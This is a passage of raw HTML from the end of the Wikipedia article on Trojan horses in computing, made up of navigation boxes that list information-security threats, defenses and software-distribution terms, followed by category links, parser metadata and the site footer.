security</a></li> <li><a href="/wiki/Intrusion_detection_system" title="Intrusion detection system">Intrusion detection system</a></li> <li><a href="/wiki/Mobile_security" title="Mobile security">Mobile security</a></li> <li><a href="/wiki/Network_security" title="Network security">Network security</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Countermeasures</th><td class="navbox-list-with-group navbox-list navbox-even hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Computer_and_network_surveillance" title="Computer and network surveillance">Computer and network surveillance</a></li> <li><a href="/wiki/Honeypot_(computing)" title="Honeypot (computing)">Honeypot</a></li> <li><a href="/wiki/Operation:_Bot_Roast" title="Operation: Bot Roast">Operation: Bot Roast</a></li></ul> </div></td></tr></tbody></table></div> <div class="navbox-styles"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1129693374"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1236075235"></div><div role="navigation" class="navbox" aria-labelledby="Information_security" style="padding:3px"><table class="nowraplinks mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"><tbody><tr><th scope="col" class="navbox-title" colspan="3"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1129693374"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1239400231"><div class="navbar plainlinks hlist navbar-mini"><ul><li class="nv-view"><a href="/wiki/Template:Information_security" title="Template:Information security"><abbr title="View this template">v</abbr></a></li><li class="nv-talk"><a href="/wiki/Template_talk:Information_security" title="Template talk:Information security"><abbr title="Discuss this template">t</abbr></a></li><li class="nv-edit"><a href="/wiki/Special:EditPage/Template:Information_security" title="Special:EditPage/Template:Information security"><abbr title="Edit this template">e</abbr></a></li></ul></div><div id="Information_security" style="font-size:114%;margin:0 4em"><a href="/wiki/Information_security" title="Information security">Information security</a></div></th></tr><tr><th scope="row" class="navbox-group" style="width:1%">Related security categories</th><td class="navbox-list-with-group navbox-list navbox-odd hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Computer_security" title="Computer security">Computer security</a></li> <li><a href="/wiki/Automotive_security" title="Automotive security">Automotive security</a></li> <li><a href="/wiki/Cybercrime" title="Cybercrime">Cybercrime</a> <ul><li><a href="/wiki/Cybersex_trafficking" title="Cybersex trafficking">Cybersex trafficking</a></li> <li><a href="/wiki/Computer_fraud" title="Computer fraud">Computer fraud</a></li></ul></li> <li><a href="/wiki/Cybergeddon" title="Cybergeddon">Cybergeddon</a></li> <li><a href="/wiki/Cyberterrorism" title="Cyberterrorism">Cyberterrorism</a></li> <li><a href="/wiki/Cyberwarfare" title="Cyberwarfare">Cyberwarfare</a></li> <li><a href="/wiki/Electromagnetic_warfare" class="mw-redirect" title="Electromagnetic warfare">Electromagnetic warfare</a></li> <li><a href="/wiki/Information_warfare" title="Information warfare">Information warfare</a></li> <li><a href="/wiki/Internet_security" title="Internet security">Internet security</a></li> <li><a href="/wiki/Mobile_security" title="Mobile security">Mobile security</a></li> <li><a href="/wiki/Network_security" title="Network security">Network security</a></li> <li><a href="/wiki/Copy_protection" title="Copy protection">Copy protection</a></li> <li><a href="/wiki/Digital_rights_management" title="Digital rights management">Digital rights management</a></li></ul> </div></td><td class="noviewer navbox-image" rowspan="3" style="width:1px;padding:0 0 0 2px"><div><figure class="mw-halign-center" typeof="mw:File"><a href="/wiki/File:CIAJMK1209-en.svg" class="mw-file-description" title="vectorial version"><img alt="vectorial version" src="//upload.wikimedia.org/wikipedia/commons/thumb/c/c5/CIAJMK1209-en.svg/150px-CIAJMK1209-en.svg.png" decoding="async" width="150" height="150" class="mw-file-element" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/c/c5/CIAJMK1209-en.svg/225px-CIAJMK1209-en.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/c/c5/CIAJMK1209-en.svg/300px-CIAJMK1209-en.svg.png 2x" data-file-width="496" data-file-height="496" /></a><figcaption>vectorial version</figcaption></figure></div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%"><a href="/wiki/Threat_(computer)" class="mw-redirect" title="Threat (computer)">Threats</a></th><td class="navbox-list-with-group navbox-list navbox-even hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Adware" title="Adware">Adware</a></li> <li><a href="/wiki/Advanced_persistent_threat" title="Advanced persistent threat">Advanced persistent threat</a></li> <li><a href="/wiki/Arbitrary_code_execution" title="Arbitrary code execution">Arbitrary code execution</a></li> <li><a href="/wiki/Backdoor_(computing)" title="Backdoor (computing)">Backdoors</a></li> <li>Bombs <ul><li><a href="/wiki/Fork_bomb" title="Fork bomb">Fork</a></li> <li><a href="/wiki/Logic_bomb" title="Logic bomb">Logic</a></li> <li><a href="/wiki/Time_bomb_(software)" title="Time bomb (software)">Time</a></li> <li><a href="/wiki/Zip_bomb" title="Zip bomb">Zip</a></li></ul></li> <li><a href="/wiki/Hardware_backdoor" title="Hardware backdoor">Hardware backdoors</a></li> <li><a href="/wiki/Code_injection" title="Code injection">Code injection</a></li> <li><a href="/wiki/Crimeware" title="Crimeware">Crimeware</a></li> <li><a href="/wiki/Cross-site_scripting" title="Cross-site scripting">Cross-site scripting</a></li> <li><a href="/wiki/Cross-site_leaks" title="Cross-site leaks">Cross-site leaks</a></li> <li><a href="/wiki/DOM_clobbering" title="DOM clobbering">DOM clobbering</a></li> <li><a href="/wiki/History_sniffing" title="History sniffing">History sniffing</a></li> <li><a href="/wiki/Cryptojacking" title="Cryptojacking">Cryptojacking</a></li> <li><a href="/wiki/Botnet" title="Botnet">Botnets</a></li> <li><a href="/wiki/Data_breach" title="Data breach">Data breach</a></li> <li><a href="/wiki/Drive-by_download" title="Drive-by download">Drive-by download</a></li> <li><a href="/wiki/Browser_Helper_Object" title="Browser Helper Object">Browser Helper Objects</a></li> <li><a href="/wiki/Computer_virus" title="Computer virus">Viruses</a></li> <li><a href="/wiki/Data_scraping" title="Data scraping">Data scraping</a></li> <li><a href="/wiki/Denial-of-service_attack" title="Denial-of-service attack">Denial-of-service attack</a></li> <li><a href="/wiki/Eavesdropping" title="Eavesdropping">Eavesdropping</a></li> <li><a href="/wiki/Email_fraud" title="Email fraud">Email fraud</a></li> <li><a href="/wiki/Email_spoofing" title="Email spoofing">Email spoofing</a></li> <li><a href="/wiki/Exploit_(computer_security)" title="Exploit (computer security)">Exploits</a></li> <li><a href="/wiki/Dialer#Fraudulent_dialer" title="Dialer">Fraudulent dialers</a></li> <li><a href="/wiki/Hacktivism" title="Hacktivism">Hacktivism</a></li> <li><a href="/wiki/Infostealer" title="Infostealer">Infostealer</a></li> <li><a href="/wiki/Insecure_direct_object_reference" title="Insecure direct object reference">Insecure direct object reference</a></li> <li><a href="/wiki/Keystroke_logging" title="Keystroke logging">Keystroke loggers</a></li> <li><a href="/wiki/Malware" title="Malware">Malware</a></li> <li><a href="/wiki/Payload_(computing)" title="Payload (computing)">Payload</a></li> <li><a href="/wiki/Phishing" title="Phishing">Phishing</a> <ul><li><a href="/wiki/Voice_phishing" title="Voice phishing">Voice</a></li></ul></li> <li><a href="/wiki/Polymorphic_engine" title="Polymorphic engine">Polymorphic engine</a></li> <li><a href="/wiki/Privilege_escalation" title="Privilege escalation">Privilege escalation</a></li> <li><a href="/wiki/Ransomware" title="Ransomware">Ransomware</a></li> <li><a href="/wiki/Rootkit" title="Rootkit">Rootkits</a></li> <li><a href="/wiki/Scareware" title="Scareware">Scareware</a></li> <li><a href="/wiki/Shellcode" title="Shellcode">Shellcode</a></li> <li><a href="/wiki/Spamming" title="Spamming">Spamming</a></li> <li><a href="/wiki/Social_engineering_(security)" title="Social engineering (security)">Social engineering</a></li> <li><a href="/wiki/Spyware" title="Spyware">Spyware</a></li> <li><a href="/wiki/Software_bug" title="Software bug">Software bugs</a></li> <li><a class="mw-selflink selflink">Trojan horses</a></li> <li><a href="/wiki/Hardware_Trojan" title="Hardware Trojan">Hardware Trojans</a></li> <li><a href="/wiki/Remote_access_trojan" class="mw-redirect" title="Remote access trojan">Remote access trojans</a></li> <li><a href="/wiki/Vulnerability_(computing)" class="mw-redirect" title="Vulnerability (computing)">Vulnerability</a></li> <li><a href="/wiki/Web_shell" title="Web shell">Web shells</a></li> <li><a href="/wiki/Wiper_(malware)" title="Wiper (malware)">Wiper</a></li> <li><a href="/wiki/Computer_worm" title="Computer worm">Worms</a></li> <li><a href="/wiki/SQL_injection" title="SQL injection">SQL injection</a></li> <li><a href="/wiki/Rogue_security_software" title="Rogue security software">Rogue security software</a></li> <li><a href="/wiki/Zombie_(computing)" title="Zombie (computing)">Zombie</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Defenses</th><td class="navbox-list-with-group navbox-list navbox-odd hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Application_security" title="Application security">Application security</a> <ul><li><a href="/wiki/Secure_coding" title="Secure coding">Secure coding</a></li> <li>Secure by default</li> <li><a href="/wiki/Secure_by_design" title="Secure by design">Secure by design</a> <ul><li><a href="/wiki/Misuse_case" title="Misuse case">Misuse case</a></li></ul></li></ul></li> <li><a href="/wiki/Computer_access_control" title="Computer access control">Computer access control</a> <ul><li><a href="/wiki/Authentication" title="Authentication">Authentication</a> <ul><li><a href="/wiki/Multi-factor_authentication" title="Multi-factor authentication">Multi-factor authentication</a></li></ul></li> <li><a href="/wiki/Authorization" title="Authorization">Authorization</a></li></ul></li> <li><a href="/wiki/Computer_security_software" title="Computer security software">Computer security software</a> <ul><li><a href="/wiki/Antivirus_software" title="Antivirus software">Antivirus software</a></li> <li><a href="/wiki/Security-focused_operating_system" title="Security-focused operating system">Security-focused operating system</a></li></ul></li> <li><a href="/wiki/Data-centric_security" title="Data-centric security">Data-centric security</a></li> <li><a href="/wiki/Code_obfuscation" class="mw-redirect" title="Code obfuscation">Obfuscation (software)</a></li> <li><a href="/wiki/Data_masking" title="Data masking">Data masking</a></li> <li><a href="/wiki/Encryption" title="Encryption">Encryption</a></li> <li><a href="/wiki/Firewall_(computing)" title="Firewall (computing)">Firewall</a></li> <li><a href="/wiki/Intrusion_detection_system" title="Intrusion detection system">Intrusion detection system</a> <ul><li><a href="/wiki/Host-based_intrusion_detection_system" title="Host-based intrusion detection system">Host-based intrusion detection system</a> (HIDS)</li> <li><a href="/wiki/Anomaly_detection" title="Anomaly detection">Anomaly detection</a></li></ul></li> <li><a href="/wiki/Information_security_management" title="Information security management">Information security management</a> <ul><li><a href="/wiki/Information_risk_management" class="mw-redirect" title="Information risk management">Information risk management</a></li> <li><a href="/wiki/Security_information_and_event_management" title="Security information and event management">Security information and event management</a> (SIEM)</li></ul></li> <li><a href="/wiki/Runtime_application_self-protection" title="Runtime application self-protection">Runtime application self-protection</a></li> <li><a href="/wiki/Site_isolation" title="Site isolation">Site isolation</a></li></ul> </div></td></tr></tbody></table></div> <div class="navbox-styles"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1129693374"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1236075235"></div><div role="navigation" class="navbox" aria-labelledby="Software_distribution" style="padding:3px"><table class="nowraplinks mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"><tbody><tr><th scope="col" class="navbox-title" colspan="2"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1129693374"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1239400231"><div class="navbar plainlinks hlist navbar-mini"><ul><li class="nv-view"><a href="/wiki/Template:Software_distribution" title="Template:Software distribution"><abbr title="View this template">v</abbr></a></li><li class="nv-talk"><a href="/wiki/Template_talk:Software_distribution" title="Template talk:Software distribution"><abbr title="Discuss this template">t</abbr></a></li><li class="nv-edit"><a href="/wiki/Special:EditPage/Template:Software_distribution" title="Special:EditPage/Template:Software distribution"><abbr title="Edit this template">e</abbr></a></li></ul></div><div id="Software_distribution" style="font-size:114%;margin:0 4em"><a href="/wiki/Software_distribution" title="Software distribution">Software distribution</a></div></th></tr><tr><th scope="row" class="navbox-group" style="width:1%"><a href="/wiki/Software_license" title="Software license">Licenses</a></th><td class="navbox-list-with-group navbox-list navbox-odd hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Beerware" title="Beerware">Beerware</a></li> <li><a href="/wiki/Floating_licensing" title="Floating licensing">Floating licensing</a></li> <li><a href="/wiki/Free_and_open-source_software" title="Free and open-source software">Free and open-source</a> <ul><li><a href="/wiki/Free_software" title="Free software">Free</a></li> <li><a href="/wiki/Open-source_software" title="Open-source software">Open source</a></li></ul></li> <li><a href="/wiki/Freely_redistributable_software" title="Freely redistributable software">Freely redistributable</a></li> <li><a href="/wiki/License-free_software" title="License-free software">License-free</a></li> <li><a href="/wiki/Proprietary_software" title="Proprietary software">Proprietary</a></li> <li><a href="/wiki/Public-domain_software" title="Public-domain software">Public domain</a></li> <li><a href="/wiki/Source-available_software" title="Source-available software">Source-available</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Compensation models</th><td class="navbox-list-with-group navbox-list navbox-even hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Adware" title="Adware">Adware</a></li> <li><a href="/wiki/Commercial_software" title="Commercial software">Commercial software</a> <ul><li><a href="/wiki/Retail_software" title="Retail software">Retail software</a></li></ul></li> <li><a href="/wiki/Crippleware" title="Crippleware">Crippleware</a></li> <li><a href="/wiki/Crowdfunding" title="Crowdfunding">Crowdfunding</a></li> <li><a href="/wiki/Freemium" title="Freemium">Freemium</a></li> <li><a href="/wiki/Freeware" title="Freeware">Freeware</a></li> <li><a href="/wiki/Pay_what_you_want" title="Pay what you want">Pay what you want</a> <ul><li><a href="/wiki/Careware" title="Careware">Careware</a></li> <li><a href="/wiki/Donationware" title="Donationware">Donationware</a></li></ul></li> <li><a href="/wiki/Open-core_model" title="Open-core model">Open-core model</a></li> <li><a href="/wiki/Postcardware" class="mw-redirect" title="Postcardware">Postcardware</a></li> <li><a href="/wiki/Shareware" title="Shareware">Shareware</a> <ul><li><a href="/wiki/Nagware" class="mw-redirect" title="Nagware">Nagware</a></li></ul></li> <li><a href="/wiki/Trialware" class="mw-redirect" title="Trialware">Trialware</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Delivery methods</th><td class="navbox-list-with-group navbox-list navbox-odd hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Digital_distribution" title="Digital distribution">Digital distribution</a></li> <li><a href="/wiki/File_sharing" title="File sharing">File sharing</a></li> <li><a href="/wiki/On-premises_software" title="On-premises software">On-premises</a></li> <li><a href="/wiki/Pre-installed_software" title="Pre-installed software">Pre-installed</a></li> <li><a href="/wiki/Product_bundling" title="Product bundling">Product bundling</a></li> <li><a href="/wiki/Retail_software" title="Retail software">Retail software</a></li> <li><a href="/wiki/Sneakernet" title="Sneakernet">Sneakernet</a></li> <li><a href="/wiki/Software_as_a_service" title="Software as a service">Software as a service</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Deceptive and/or illicit</th><td class="navbox-list-with-group navbox-list navbox-even hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Unwanted_software_bundling" class="mw-redirect" title="Unwanted software bundling">Unwanted software bundling</a></li> <li><a href="/wiki/Malware" title="Malware">Malware</a> <ul><li><a href="/wiki/Infostealer" title="Infostealer">Infostealer</a></li> <li><a href="/wiki/Ransomware" title="Ransomware">Ransomware</a></li> <li><a href="/wiki/Spyware" title="Spyware">Spyware</a></li> <li><a class="mw-selflink selflink">Trojan horse</a></li> <li><a href="/wiki/Computer_worm" title="Computer worm">Worm</a></li></ul></li> <li><a href="/wiki/Scareware" title="Scareware">Scareware</a></li> <li><a href="/wiki/Shovelware" title="Shovelware">Shovelware</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%"><a href="/wiki/Software_release_life_cycle" title="Software release life cycle">Software release life cycle</a></th><td class="navbox-list-with-group navbox-list navbox-odd hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Abandonware" title="Abandonware">Abandonware</a></li> <li><a href="/wiki/End-of-life_product" title="End-of-life product">End-of-life</a></li> <li><a href="/wiki/Long-term_support" title="Long-term support">Long-term support</a></li> <li><a href="/wiki/Software_maintenance" title="Software maintenance">Software maintenance</a></li> <li><a href="/wiki/Software_maintainer" title="Software maintainer">Software maintainer</a></li> <li><a href="/wiki/Software_publisher" title="Software publisher">Software publisher</a></li> <li><a href="/wiki/Vaporware" title="Vaporware">Vaporware</a> <ul><li><a href="/wiki/List_of_vaporware" title="List of vaporware">list</a></li></ul></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%"><a href="/wiki/Copy_protection" title="Copy protection">Copy protection</a></th><td class="navbox-list-with-group navbox-list navbox-even hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Digital_rights_management" title="Digital rights management">Digital rights management</a></li> <li><a href="/wiki/Software_protection_dongle" title="Software protection dongle">Software protection dongle</a></li> <li><a href="/wiki/License_manager" class="mw-redirect" title="License manager">License manager</a></li> <li><a href="/wiki/Product_activation" title="Product activation">Product activation</a></li> <li><a href="/wiki/Product_key" title="Product key">Product key</a></li> <li><a href="/wiki/Software_copyright" title="Software copyright">Software copyright</a></li> <li><a href="/wiki/Software_license_server" title="Software license server">Software license server</a></li> <li><a href="/wiki/Software_patent" title="Software patent">Software patent</a></li> <li><a href="/wiki/Torrent_poisoning" title="Torrent poisoning">Torrent poisoning</a></li></ul> </div></td></tr></tbody></table></div><div class="navbox-styles"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1129693374"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1236075235"></div><div role="navigation" class="navbox authority-control" aria-label="Navbox" style="padding:3px"><table class="nowraplinks hlist navbox-inner" style="border-spacing:0;background:transparent;color:inherit"><tbody><tr><th scope="row" class="navbox-group" style="width:1%"><a href="/wiki/Help:Authority_control" title="Help:Authority control">Authority control databases</a>: National <span class="mw-valign-text-top noprint" typeof="mw:File/Frameless"><a href="https://www.wikidata.org/wiki/Q14639#identifiers" title="Edit this at Wikidata"><img alt="Edit this at Wikidata" src="//upload.wikimedia.org/wikipedia/en/thumb/8/8a/OOjs_UI_icon_edit-ltr-progressive.svg/10px-OOjs_UI_icon_edit-ltr-progressive.svg.png" decoding="async" width="10" height="10" class="mw-file-element" srcset="//upload.wikimedia.org/wikipedia/en/thumb/8/8a/OOjs_UI_icon_edit-ltr-progressive.svg/15px-OOjs_UI_icon_edit-ltr-progressive.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/8/8a/OOjs_UI_icon_edit-ltr-progressive.svg/20px-OOjs_UI_icon_edit-ltr-progressive.svg.png 2x" data-file-width="20" data-file-height="20" /></a></span></th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em"><ul><li><span class="uid"><a rel="nofollow" class="external text" href="https://d-nb.info/gnd/4779909-2">Germany</a></span></li></ul></div></td></tr></tbody></table></div> <!-- NewPP limit report Parsed by mw‐web.codfw.main‐8f575c78d‐rh74g Cached time: 20241126213257 Cache expiry: 2592000 Reduced expiry: false Complications: [vary‐revision‐sha1, show‐toc] CPU time usage: 0.730 seconds Real time usage: 0.900 seconds Preprocessor visited node count: 4977/1000000 Post‐expand include size: 116027/2097152 bytes Template argument size: 1495/2097152 bytes Highest expansion depth: 12/100 Expensive parser function count: 6/500 Unstrip recursion depth: 1/20 Unstrip post‐expand size: 151155/5000000 bytes Lua time usage: 0.482/10.000 seconds Lua memory usage: 23282109/52428800 bytes Number of Wikibase entities loaded: 1/400 --> <!-- Transclusion expansion time report (%,ms,calls,template) 100.00% 782.592 1 -total 31.65% 247.696 18 Template:Annotated_link 26.87% 210.304 2 Template:Reflist 17.14% 134.151 22 Template:Cite_web 10.36% 81.068 1 Template:Computer_hacking 10.05% 78.682 1 Template:Sidebar_with_collapsible_lists 7.01% 54.868 1 Template:Short_description 6.08% 47.576 3 Template:Navbox 5.48% 42.897 1 Template:Malware 4.43% 34.666 2 Template:Pagetype --> <!-- Saved in parser cache with key enwiki:pcache:idhash:30056-0!canonical and timestamp 20241126213257 and revision id 1259654683. Rendering was triggered because: page-view --> </div><!--esi <esi:include src="/esitest-fa8a495983347898/content" /> --><noscript><img src="https://login.wikimedia.org/wiki/Special:CentralAutoLogin/start?type=1x1" alt="" width="1" height="1" style="border: none; position: absolute;"></noscript> <div class="printfooter" data-nosnippet="">Retrieved from "<a dir="ltr" href="https://en.wikipedia.org/w/index.php?title=Trojan_horse_(computing)&amp;oldid=1259654683">https://en.wikipedia.org/w/index.php?title=Trojan_horse_(computing)&amp;oldid=1259654683</a>"</div></div> <div id="catlinks" class="catlinks" data-mw="interface"><div id="mw-normal-catlinks" class="mw-normal-catlinks"><a href="/wiki/Help:Category" title="Help:Category">Categories</a>: <ul><li><a href="/wiki/Category:Trojan_horses" title="Category:Trojan horses">Trojan horses</a></li><li><a href="/wiki/Category:Social_engineering_(security)" title="Category:Social engineering (security)">Social engineering (security)</a></li><li><a href="/wiki/Category:Spyware" title="Category:Spyware">Spyware</a></li><li><a href="/wiki/Category:Cyberwarfare" title="Category:Cyberwarfare">Cyberwarfare</a></li><li><a href="/wiki/Category:Security_breaches" title="Category:Security breaches">Security breaches</a></li></ul></div><div id="mw-hidden-catlinks" class="mw-hidden-catlinks mw-hidden-cats-hidden">Hidden categories: <ul><li><a href="/wiki/Category:CS1_maint:_unfit_URL" title="Category:CS1 maint: unfit URL">CS1 maint: unfit URL</a></li><li><a href="/wiki/Category:Articles_with_short_description" title="Category:Articles with short description">Articles with short description</a></li><li><a href="/wiki/Category:Short_description_is_different_from_Wikidata" title="Category:Short description is different from Wikidata">Short description is different from Wikidata</a></li><li><a href="/wiki/Category:Use_mdy_dates_from_May_2018" title="Category:Use mdy dates from May 2018">Use mdy dates from May 2018</a></li><li><a href="/wiki/Category:Pages_displaying_short_descriptions_of_redirect_targets_via_Module:Annotated_link" title="Category:Pages displaying short descriptions of redirect targets via Module:Annotated link">Pages displaying short descriptions of redirect targets via Module:Annotated link</a></li><li><a href="/wiki/Category:Commons_category_link_is_on_Wikidata" title="Category:Commons category link is on Wikidata">Commons category link is on Wikidata</a></li></ul></div></div> </div> </main> </div> <div class="mw-footer-container"> <footer id="footer" class="mw-footer" > <ul id="footer-info"> <li id="footer-info-lastmod"> This page was last edited on 26 November 2024, at 10:01<span class="anonymous-show">&#160;(UTC)</span>.</li> <li id="footer-info-copyright">Text is available under the <a href="/wiki/Wikipedia:Text_of_the_Creative_Commons_Attribution-ShareAlike_4.0_International_License" title="Wikipedia:Text of the Creative Commons Attribution-ShareAlike 4.0 International License">Creative Commons Attribution-ShareAlike 4.0 License</a>; additional terms may apply. By using this site, you agree to the <a href="https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use" class="extiw" title="foundation:Special:MyLanguage/Policy:Terms of Use">Terms of Use</a> and <a href="https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy" class="extiw" title="foundation:Special:MyLanguage/Policy:Privacy policy">Privacy Policy</a>. Wikipedia® is a registered trademark of the <a rel="nofollow" class="external text" href="https://wikimediafoundation.org/">Wikimedia Foundation, Inc.</a>, a non-profit organization.</li> </ul> <ul id="footer-places"> <li id="footer-places-privacy"><a href="https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy">Privacy policy</a></li> <li id="footer-places-about"><a href="/wiki/Wikipedia:About">About Wikipedia</a></li> <li id="footer-places-disclaimers"><a href="/wiki/Wikipedia:General_disclaimer">Disclaimers</a></li> <li id="footer-places-contact"><a href="//en.wikipedia.org/wiki/Wikipedia:Contact_us">Contact Wikipedia</a></li> <li id="footer-places-wm-codeofconduct"><a href="https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct">Code of Conduct</a></li> <li id="footer-places-developers"><a href="https://developer.wikimedia.org">Developers</a></li> <li id="footer-places-statslink"><a href="https://stats.wikimedia.org/#/en.wikipedia.org">Statistics</a></li> <li id="footer-places-cookiestatement"><a href="https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statement">Cookie statement</a></li> <li id="footer-places-mobileview"><a href="//en.m.wikipedia.org/w/index.php?title=Trojan_horse_(computing)&amp;mobileaction=toggle_view_mobile" class="noprint stopMobileRedirectToggle">Mobile view</a></li> </ul> <ul id="footer-icons" class="noprint"> <li id="footer-copyrightico"><a href="https://wikimediafoundation.org/" class="cdx-button cdx-button--fake-button cdx-button--size-large cdx-button--fake-button--enabled"><img src="/static/images/footer/wikimedia-button.svg" width="84" height="29" alt="Wikimedia Foundation" loading="lazy"></a></li> <li id="footer-poweredbyico"><a href="https://www.mediawiki.org/" class="cdx-button cdx-button--fake-button cdx-button--size-large cdx-button--fake-button--enabled"><img src="/w/resources/assets/poweredby_mediawiki.svg" alt="Powered by MediaWiki" width="88" height="31" loading="lazy"></a></li> </ul> </footer> </div> </div> </div> <div class="vector-settings" id="p-dock-bottom"> <ul></ul> </div><script>(RLQ=window.RLQ||[]).push(function(){mw.config.set({"wgHostname":"mw-web.codfw.main-7cd56fbfb6-44p9f","wgBackendResponseTime":145,"wgPageParseReport":{"limitreport":{"cputime":"0.730","walltime":"0.900","ppvisitednodes":{"value":4977,"limit":1000000},"postexpandincludesize":{"value":116027,"limit":2097152},"templateargumentsize":{"value":1495,"limit":2097152},"expansiondepth":{"value":12,"limit":100},"expensivefunctioncount":{"value":6,"limit":500},"unstrip-depth":{"value":1,"limit":20},"unstrip-size":{"value":151155,"limit":5000000},"entityaccesscount":{"value":1,"limit":400},"timingprofile":["100.00% 782.592 1 -total"," 31.65% 247.696 18 Template:Annotated_link"," 26.87% 210.304 2 Template:Reflist"," 17.14% 134.151 22 Template:Cite_web"," 10.36% 81.068 1 Template:Computer_hacking"," 10.05% 78.682 1 Template:Sidebar_with_collapsible_lists"," 7.01% 54.868 1 Template:Short_description"," 6.08% 47.576 3 Template:Navbox"," 5.48% 42.897 1 Template:Malware"," 4.43% 34.666 2 Template:Pagetype"]},"scribunto":{"limitreport-timeusage":{"value":"0.482","limit":"10.000"},"limitreport-memusage":{"value":23282109,"limit":52428800}},"cachereport":{"origin":"mw-web.codfw.main-8f575c78d-rh74g","timestamp":"20241126213257","ttl":2592000,"transientcontent":false}}});});</script> <script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Article","name":"Trojan horse (computing)","url":"https:\/\/en.wikipedia.org\/wiki\/Trojan_horse_(computing)","sameAs":"http:\/\/www.wikidata.org\/entity\/Q14639","mainEntity":"http:\/\/www.wikidata.org\/entity\/Q14639","author":{"@type":"Organization","name":"Contributors to Wikimedia projects"},"publisher":{"@type":"Organization","name":"Wikimedia Foundation, Inc.","logo":{"@type":"ImageObject","url":"https:\/\/www.wikimedia.org\/static\/images\/wmf-hor-googpub.png"}},"datePublished":"2001-09-28T02:09:56Z","dateModified":"2024-11-26T10:01:10Z","headline":"A Trojan horse, or Trojan, is a type of malicious software that pretends to be a legitimate program to trick users into installing it. Once installed, it can steal information, create security vulnerabilities, or cause damage to the system."}</script> </body> </html>

Pages: 1 2 3 4 5 6 7 8 9 10